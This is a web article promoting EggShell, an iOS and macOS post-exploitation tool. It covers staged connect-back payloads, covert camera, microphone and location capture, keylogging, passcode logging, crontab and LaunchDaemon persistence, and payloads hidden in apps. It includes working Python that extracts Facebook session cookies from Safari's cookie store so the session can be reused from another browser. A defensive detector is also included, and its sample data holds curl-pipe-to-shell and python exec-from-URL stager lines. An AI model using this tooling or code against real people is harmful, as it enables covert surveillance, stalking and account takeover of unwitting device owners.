
EggShell – iOS And macOS Surveillance Tool

EggShell is an iOS and macOS post-exploitation surveillance pentest tool written in Python.

This tool creates one-line, multi-stage payloads that give you a command-line session with extra functionality. EggShell gives you the power and convenience of uploading/downloading files, taking pictures, location tracking, shell command execution, persistence, privilege escalation, password retrieval, and much more.

Server communication features end-to-end encryption with 128-bit AES and the ability to handle multiple clients. This is a proof-of-concept pentest tool, intended for use only on machines you own or are authorized to test.

Getting Started

To use EggShell, you must have Python 2.7.x and the pycrypto module installed. Both Python 2.7 and pycrypto have since reached end of life, so plan on giving the tool its own dedicated environment.

Install using git (macOS/Linux):

git clone https://github.com/neoneggplant/EggShell
cd EggShell
python eggshell.py

Create And Run A Payload

Using the menu, we can choose to create a bash payload; this is what will be run on the target machine. It is a two-stage payload: it first connects to our EggShell server and downloads a shell script that tells the server what kind of device it is running on, then connects back once more to download and execute the binary.

Example: running the created payload on our target

Back on our server, we can see that we received a connection and an EggShell session has been started.

macOS Commands

ls : list contents of directory
cd : change directories
rm : delete file
pwd : get current directory
download : download file
picture : take picture through iSight camera
getpid : get process id
openurl : open url through the default browser
idletime : get the amount of time since the keyboard/cursor were touched
getpaste : get pasteboard contents
mic : record microphone
brightness : adjust screen brightness
exec : execute command
persistence : attempts to connect back every 60 seconds
rmpersistence : removes persistence

iOS Commands

sysinfo : get system information
ls : list contents of directory
cd : change directories
rm : delete file
pwd : get current directory
download : download file
frontcam : take picture through front camera
backcam : take picture through back camera
mic : record microphone
getpid : get process id
vibrate : make device vibrate
alert : make alert show up on device
say : make device speak
locate : get device location
respring : respring device
setvol : set mediaplayer volume
getvol : view mediaplayer volume
isplaying : view mediaplayer info
openurl : open url on device
dial : dial number on device
battery : get battery level
listapps : list bundle identifiers
open : open app
persistence : installs LaunchDaemon – tries to connect every 30 seconds
rmpersistence : uninstalls LaunchDaemon
installpro : installs eggshellpro to device

EggShellPro Commands (Cydia Substrate Extension)

lock : simulate lock button press
wake : wake device from sleeping state
home : simulate home button press
doublehome : simulate home button double press
play : plays music
pause : pause music
next : next track
prev : previous track
getpasscode : log successful passcode attempts
unlock : unlock with passcode
keylog : log keystrokes
keylogclear : clear keylog data
locationservice : turn location services on or off

EggShell Pro

EggShell Pro is a Cydia Substrate library that hooks system functions in iOS. With this extension, we can perform home button actions, simulate the lock button, toggle location services, and more. Another feature is logging the passcode the iPhone was last unlocked with. When interacting with an iOS device, simply run "installpro" and the dylib will be uploaded to the device, followed by a respring.

Navigating/Downloading Files

EggShell feels like a command-line interface. Using the Unix-like commands built into EggShell, we can print the working directory (pwd), list a directory (ls), remove files (rm), and change directories (cd), so we can navigate the file system just as we would from a shell. With the download command we can pull any file over the encrypted connection. In the example below, we move through a directory and download a PDF file from the target machine.

Taking Pictures

Taking a photo with the "picture" command on macOS will activate the iSight camera and send the image data back to the server. To take a picture on iOS, use "frontcam" or "backcam".

iOS Location Tracking Even With Location Services Off

EggShellPro lets us send commands to toggle location services on or off. This means that even if location services are off, we can turn them on, retrieve the device's location, and then quickly turn them off again.

We get the coordinates of the device's current position and a convenient link to Google Maps.

iOS Getting Passcode

EggShellPro hooks the lock-screen functions and logs each successful passcode entry in memory. When we run "getpasscode", we are sent back the passcode that was last used to unlock the device.

macOS Hijacking Safari Facebook Sessions

With the command getfacebook, a special function in EggShell parses Safari's binary cookie store. Because Safari's Cookies.binarycookies file is unencrypted on disk, we can easily read out the Facebook c_user and xs cookies and use them to log in from another browser; the Secure and HttpOnly flags only govern how a browser sends a cookie, not how it is stored.
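As an added example (this is not EggShell's getfacebook code), here is a Python 3 parser for the Cookies.binarycookies layout Safari uses: a "cook" magic, a big-endian page table, and little-endian cookie records whose url/name/path/value fields are offsets to NUL-terminated strings within the record. The secure/httponly flag bits and the Mac-epoch timestamps follow the same layout. The sample store is constructed in memory by build_binarycookies so the script runs offline; that builder exists only to make the sample. Pass a path to read a real store (on macOS it lives under ~/Library/Cookies/).

```python
import struct
import sys

MAC_EPOCH = 978307200  # seconds from 1970-01-01 to 2001-01-01; Safari stores Mac-epoch doubles
FLAG_SECURE, FLAG_HTTPONLY = 0x1, 0x4
REC_HDR = 56  # fixed-size part of a cookie record before its strings


def _cstring(buf, off):
    """Read a NUL-terminated string starting at off."""
    return buf[off:buf.index(b"\x00", off)].decode("utf-8", "replace")


def parse_binarycookies(data):
    """Decode a Cookies.binarycookies blob into a list of cookie dicts."""
    if data[:4] != b"cook":
        raise ValueError("missing 'cook' magic")
    num_pages = struct.unpack(">I", data[4:8])[0]
    page_sizes = struct.unpack(">%dI" % num_pages, data[8:8 + 4 * num_pages])
    pos = 8 + 4 * num_pages
    cookies = []
    for size in page_sizes:  # trailing checksum/bplist after the pages is ignored
        page = data[pos:pos + size]
        pos += size
        if page[:4] != b"\x00\x00\x01\x00":
            raise ValueError("bad page header")
        count = struct.unpack("<I", page[4:8])[0]
        offsets = struct.unpack("<%dI" % count, page[8:8 + 4 * count])
        for off in offsets:  # cookie offsets are relative to the page
            rec_len, _, flags, _, url_o, name_o, path_o, value_o = struct.unpack("<8I", page[off:off + 32])
            rec = page[off:off + rec_len]
            expires, created = struct.unpack("<dd", rec[40:56])
            cookies.append({
                "url": _cstring(rec, url_o),  # string offsets are relative to the record
                "name": _cstring(rec, name_o),
                "path": _cstring(rec, path_o),
                "value": _cstring(rec, value_o),
                "secure": bool(flags & FLAG_SECURE),
                "httponly": bool(flags & FLAG_HTTPONLY),
                "expires": expires + MAC_EPOCH,
                "created": created + MAC_EPOCH,
            })
    return cookies


def facebook_session(cookies):
    """Return the c_user/xs pair that together identify a Facebook session, or None."""
    found = {c["name"]: c["value"] for c in cookies
             if c["url"].lstrip(".").endswith("facebook.com") and c["name"] in ("c_user", "xs")}
    return found if len(found) == 2 else None


def build_binarycookies(cookies):
    """Encode cookies as a one-page store. Used only to construct the sample input below."""
    records = []
    for c in cookies:
        strings, offs = b"", {}
        for key in ("url", "name", "path", "value"):
            offs[key] = REC_HDR + len(strings)
            strings += c[key].encode("utf-8") + b"\x00"
        flags = (FLAG_SECURE if c.get("secure") else 0) | (FLAG_HTTPONLY if c.get("httponly") else 0)
        rec = struct.pack("<8I", REC_HDR + len(strings), 0, flags, 0,
                          offs["url"], offs["name"], offs["path"], offs["value"])
        rec += b"\x00" * 8 + struct.pack("<dd", c.get("expires", 0) - MAC_EPOCH,
                                         c.get("created", 0) - MAC_EPOCH)
        records.append(rec + strings)
    offsets, pos = [], 12 + 4 * len(records)  # page header + count + offset table + terminator
    for r in records:
        offsets.append(pos)
        pos += len(r)
    page = (b"\x00\x00\x01\x00" + struct.pack("<I", len(records))
            + struct.pack("<%dI" % len(records), *offsets) + b"\x00" * 4 + b"".join(records))
    return b"cook" + struct.pack(">I", 1) + struct.pack(">I", len(page)) + page


# Constructed sample: two Facebook session cookies plus an unrelated one.
SAMPLE_STORE = build_binarycookies([
    {"url": ".facebook.com", "name": "c_user", "path": "/", "value": "100000000000001",
     "secure": True, "expires": 1700000000, "created": 1690000000},
    {"url": ".facebook.com", "name": "xs", "path": "/", "value": "12%3Aexample%3A2%3A1690000000",
     "secure": True, "httponly": True, "expires": 1700000000, "created": 1690000000},
    {"url": "example.org", "name": "sid", "path": "/", "value": "abc", "expires": 1700000000},
])

if __name__ == "__main__":
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_STORE
    parsed = parse_binarycookies(blob)
    for c in parsed:
        print("%-16s %-8s secure=%-5s httponly=%s" % (c["url"], c["name"], c["secure"], c["httponly"]))
    print("facebook session:", facebook_session(parsed))
```

The point of facebook_session returning the pair only when both cookies are present is that c_user alone is just a user id; it is the xs cookie that makes the pair a bearer session, so a finding should report both or neither.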

macOS Persistence

To achieve persistence, even without being root, the "persistence" command adds the payload to the user's crontab. It then attempts to reconnect every 60 seconds, even after a reboot. To remove persistence, simply enter "rmpersistence" and it removes itself from the crontab.
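From the defender's side, the persistence described above (a crontab entry on macOS, a LaunchDaemon with a 30-second retry on iOS) leaves a recognisable footprint: a job scheduled as tightly as the scheduler allows whose command fetches something over the network and runs it. The Python 3 checker below is an added example, not part of EggShell; the heuristics, the regexes and the sample crontab and plist inputs are constructed here. Feed it the output of crontab -l for each user, and the plists under /Library/LaunchDaemons and /Library/LaunchAgents.

```python
import plistlib
import re

# Signals of a beaconing stager (heuristics chosen for this example):
EVERY_MINUTE = re.compile(r"^\*\s+\*\s+\*\s+\*\s+\*\s")  # '* * * * *' is as often as cron runs
FETCHER = re.compile(r"\b(curl|wget|nc|ncat|python\S*|perl|ruby|osascript)\b")
PIPE_TO_INTERP = re.compile(r"\|\s*(ba|z)?sh\b|\|\s*python\S*|\bbase64\s+(-d|-D|--decode)")


def suspicious_cron_lines(crontab_text):
    """Return (line_no, line, reasons) for crontab entries that match two or more signals."""
    hits = []
    for no, raw in enumerate(crontab_text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        reasons = []
        if EVERY_MINUTE.match(line) or line.startswith("@reboot"):
            reasons.append("runs every minute or at boot")
        if FETCHER.search(line):
            reasons.append("calls a network or scripting client")
        if PIPE_TO_INTERP.search(line):
            reasons.append("feeds fetched data to an interpreter")
        if len(reasons) >= 2:
            hits.append((no, line, reasons))
    return hits


def suspicious_launchdaemon(plist_bytes, max_interval=60):
    """Return reasons a launchd job looks like a beacon: a tight schedule AND a fetch/eval command."""
    job = plistlib.loads(plist_bytes)
    args = job.get("ProgramArguments") or [job.get("Program", "")]
    cmd = " ".join(str(a) for a in args)
    schedule = []
    interval = job.get("StartInterval")
    if isinstance(interval, int) and interval <= max_interval:
        schedule.append("StartInterval of %d s" % interval)
    if job.get("KeepAlive"):
        schedule.append("KeepAlive relaunches it whenever it exits")
    if schedule and (FETCHER.search(cmd) or PIPE_TO_INTERP.search(cmd)):
        return schedule + ["command fetches or evals remote content: " + cmd]
    return []


# Constructed sample of `crontab -l` output: two benign jobs, two stagers.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/mdfind -name '*.pdf' > /dev/null
*/5 * * * * /usr/local/bin/backup.sh
* * * * * curl -s http://203.0.113.10:8080/stage1.sh | bash
@reboot python -c 'import urllib2;exec(urllib2.urlopen("http://203.0.113.10:8080/s").read())'
"""

# Constructed LaunchDaemon plists: one that re-fetches a stage every 30 s, one benign hourly job.
SAMPLE_DAEMON = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.updater</string>
  <key>ProgramArguments</key><array>
    <string>/bin/sh</string><string>-c</string>
    <string>curl -s http://203.0.113.10:8080/stage1.sh | sh</string>
  </array>
  <key>StartInterval</key><integer>30</integer>
  <key>RunAtLoad</key><true/>
</dict></plist>
"""
BENIGN_DAEMON = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.housekeeping</string>
  <key>ProgramArguments</key><array><string>/usr/bin/true</string></array>
  <key>StartInterval</key><integer>3600</integer>
</dict></plist>
"""

if __name__ == "__main__":
    for no, line, reasons in suspicious_cron_lines(SAMPLE_CRONTAB):
        print("crontab line %d: %s\n    %s" % (no, line, "; ".join(reasons)))
    for name, blob in (("com.example.updater", SAMPLE_DAEMON), ("com.example.housekeeping", BENIGN_DAEMON)):
        print("%s: %s" % (name, "; ".join(suspicious_launchdaemon(blob)) or "clean"))
```

Requiring two signals rather than one keeps ordinary every-minute jobs and ordinary curl jobs out of the report; the pairing of a tight schedule with a network fetch is what distinguishes a beacon from either alone.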

Recording Audio

Using the "mic record" command, we can record audio asynchronously on both iOS and macOS, meaning we can keep recording through the microphone while running other commands. When we are finished, simply run "mic stop"; this stops the recording and downloads the audio data.

Handling Multiple Sessions

With the built-in "MultiServer" feature, we can listen for multiple connections. Below is an example with two connections from the same device, but this works with multiple devices as well.

As targets connect, we can use "sessions" to list all active sessions, "interact" to interact with a session, "close" to close a session by number, and "back" to return to the MultiServer console.

Payloads In Apps

Payloads can easily be embedded inside apps. Below is an example of using the system() function to call our payload, still in just one line. This method works on both macOS and jailbroken iOS.

Immediately after the app is launched, our payload runs and, as expected, we get a connection.

Safari Exploit + EggShell

Soon after iOS security researcher Luca Todesco released his browser-based 9.3.3 jailbreak, I reused some of his code to demonstrate taking over a device from Safari. Below is Lucas Jackson's video demonstration featured on EverythingApplePro.

Original Video
